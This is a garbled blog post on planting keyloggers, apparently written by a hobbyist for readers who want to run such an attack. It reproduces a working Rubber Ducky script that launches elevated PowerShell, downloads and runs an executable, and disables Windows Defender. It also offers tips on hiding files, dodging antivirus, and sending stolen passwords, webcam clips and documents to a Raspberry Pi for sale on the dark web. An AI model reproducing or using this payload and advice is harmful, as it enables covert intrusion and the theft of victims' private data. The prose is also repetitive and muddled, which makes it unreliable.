keyloggers complete detailed article

 

feature
A keylogger is a tool designed to record every keystroke on an system for later retrieval its purpose is usually to allow the user of this tool to gain access to confidential information typed by the target or typed in the affected computer such as users password and other private information. often hackers use viruses trojans and rootkits like methods to remain active and hidden
the amount of info a keylogger can collect by keylogger software can collect by keylogger software can vary by the software used and how complex it is . the most basic program can collect the info only typed by the target and collect it via email or application . more sophisticated keylogger software can collect :-
  • typed information
  • GPS Location
  • IP location
  • Saved Data
  • FTP and SSH Transfer service
  • Download and upload of data
context
  • program a keylogger in python
  • injecting the script
  • setting up auto run feature
  • select retrieving information method
  • tools and things required to execute the attack
  • risk
  • preventions
  • courses on Udemy
program a keylogger in python
u may need python and c++ even some Arduino and ducky coding engines to run and execute the codes for the keyloggers .
python keylogger use python to be preinstalled in the in the victims system and to have python installed or u may convert it into a binary to be installed in the system anyway i am going to explain the dynamics but not how to code the entire thing as even i don't know how to do it don't judge me . well i am going to suggest a few Udemy courses for that u can check them out if u want to learn how to build a keylogger.
injecting the script
if u have written and converted the script to a binary file and upload it to a mediafire u can download it via a code running in the background using a ducky script now u can have the code and script in one single ducky script that it runs in the background of the system like if code it in such a way that the code uses the os function to do the background using of the tool
using this u can even stealth ur operation by adding the hiding the programs in a location and hiding the folder using the hide function or header
script download and execute the file from a website and disable defender using powershell:

REM Windows 10: Poweshell administrator download and execute file
REM Author: Judge2020
REM author website: Judge2020.com
REM
REM start of script
REM
REM let the HID enumerate
DELAY 1000
GUI r
DELAY 200
REM my best attempt at a elevated powershell instance
STRING powershell Start-Process powershell -Verb runAs
ENTER
DELAY 1000
ALT y
DELAY 200
STRING $down = New-Object System.Net.WebClient; $url = 'abc.exe'; $file = 'mess1.exe'; $down.DownloadFile($url,$file); $exec = New-Object -com shell.application; $exec.shellexecute($file);
DELAY 1000
GUI r
DELAY 200
REM my best attempt at a elevated powershell instance
STRING powershell Start-Process powershell -Verb runAs
ENTER
DELAY 1000
ALT y 
DELAY 200
STRING Set-MpPreference -DisableRealtimeMonitoring $true
ENTER
STRING exit
ENTER
exit;

the above image shows the complete map how does the hid attack work in the detailed
setting up autorun feature
using this code u can add a autorun feature for a file there are software's outside which automates the process but for the best result u can opt for injecting the codes inside another program which u know the target often uses this can be achieved by adding a new icon on the desktop replacing the already existing icon with it or u can install the autorun feature in the source code also and u can even stealth the files by converting the files to binaries and changing the name to another name from the source code only and like this u can hide this from the task manager and other uses and if u are smart enough u can code it in such a way that the antivirus software does not recognise it as an virus but as an legit application .
setting the retrieving the information method
u can select the retrieval method and the way u want to extract the data from the target one of the few options is using ssh and ftp and i think ssh is the best because the name only suggests secured shell and its recommended to keep urself safe to a certain extent from reverse engineering of the application but u can also use ftp to just transfer the files and folders to the raspberry pi setup to listen and capture the incoming data this type of keylogger is really dangerous as ur data can be transferred in just 1 or 2 hours if the attacker has good internet
u can imagine it as like this :-
( target view )
  1. i have found a pendrive fallen
  2. connected to a pc
  3. the pc restarts
  4. i have found a app on the pendrive and i run it
  5. nothing happens
  6. i remove the pendrive
( hackers view )
  1. i receive a connection
  2. i download the files i intended to
  3. install all the malicious files into the targets computer
  4. sell the files and info in the dark web
data retrieved i can retrieve:-
  • login information
  • web data
  • stored passwords
  • wifi passwords
  • system logs
  • web camera clips
  • photos
  • videos
  • download's list
  • documents
  • and many more.......
tools and things required to execute the attack
  1. rubber ducky :- Imagine plugging in a seemingly innocent USB drive into a computer and installing backdoors, exfiltrating documents, or capturing credentials . The USB Rubber Ducky injects keystrokes at superhuman speeds, violating the inherent trust computers have in humans by posing as a keyboard
  2. internet :-If you never connect your computer, you are 100 percent safe from hackers on the internet. There is no way someone can hack and retrieve, alter or monitor information without physical access. This however is not the only way unconnected computers or smartphones can be accessed or monitored.
  3. Raspberry pi 4:-The Raspberry Pi 4 can do a surprising amount. Amateur tech enthusiasts use Pi boards as media centers, file servers, retro games consoles, routers, and network-level ad-blockers, for starters.
  4. python and c++ scripting engine :-u can use any scripting engine from notepad to visual studios for the job.
  5. ducky and ardino scripting engine :- u can do ducky scripts in any script engine but ardrino uses ardrino engine to write ardrino scripts.
note
hacking is a risky job and u may end up behind bars for doing things such as hacking IT services and other things please do it responsibly by taking permission by the target before doing such a thing .
follow me
follow my twitter account for latest updates
  • twitter: morpheuslord2
  • instagram: morpheuslord_9034
  • email: morpheuslord@protonmail.com

Comments

Post a Comment